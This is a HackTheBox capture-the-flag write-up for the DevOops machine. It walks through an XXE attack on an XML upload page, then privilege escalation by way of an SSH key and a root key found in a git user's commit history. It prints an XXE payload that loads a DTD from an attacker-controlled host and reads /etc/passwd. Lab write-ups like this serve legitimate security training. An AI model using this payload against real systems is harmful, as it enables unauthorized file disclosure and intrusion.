DevOops Box Writeup & Walkthrough – [HTB] – HackTheBox

posted in HackTheBox, Writeup on by

Introduction

DevOops is a machine on the HackTheBox.

Hack The Box is an online platform allowing you to test your penetration testing skills and exchange ideas and methodologies with other members of similar interests. It contains several challenges that are constantly updated.

This article will show how to hack DevOops box and get user.txt and root.txt.

DevOops Box

Collection

First, we use NMAP to Scan the open ports and see if there any port is open.

DevOops Scan Ports

Let’s open browser, and visit http://10.10.10.91:5000/ .

DevOops Port 5000

OK, it looks like a website. Let’s enumerate the website.

After enumeration, we found that there is a page that we can upload XML file.

Hack the DevOops Box

Get User.txt

I think that it has XXE issue. But, let’s submit a simple XML first.

<note>
<Author>Tom</Author>
<Subject>Computer</Subject>
<Content>HowToBuyAMacComputer</Content>
</note>

After we submitting this file, the website return a message.

DevOops XML Message

Now, let’s submit our payload.

First, we create a new XML file:

<!--?xml version="1.0" ?-->
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://10.10.14.2/1.dtd">%remote;%int;%trick;]>
<note>
<Author>&b;</Author>
<Subject>Jani</Subject>
<Content>Reminder</Content>
</note>

Then, we create a DTD file on our Kali Linux, the content is:

<p class="p1"><!ENTITY b SYSTEM "file:///etc/passwd" ></p>

Then, we build a simple HTTP Server by using python.

Finally, it reads the /etc/passwd file.

DevOops XXE Read File

Due to SSH is opened, I think that I can find ssh key under default folder.

DevOops SSH Key

Then, we got user.txt

DevOops UserTxT

Get Root.txt

We found that there is a “git” user. So, we try to login as git.

DevOops Git User

Then, we check the .bash_history file.

DevOops BashHistory

We found that git user initial a git repo. Let’s go to this folder and see what we can find.

We check the git log.

DevOops Git Log

We found that this user add a key. Let’s check this commit.

DevOops Git Root Key

Then, we use this key to login.

DevOops Root TXT

Summary

This box is not difficult, the difficulty should around 3. There are 2 challenges. First, create the XML payload. Second, Found that there is a git user account and it can be login. Once you found that git can be login, you will realise that there must be some information in the git log.

If you want to read more HackTheBox writeup, you can visit this link.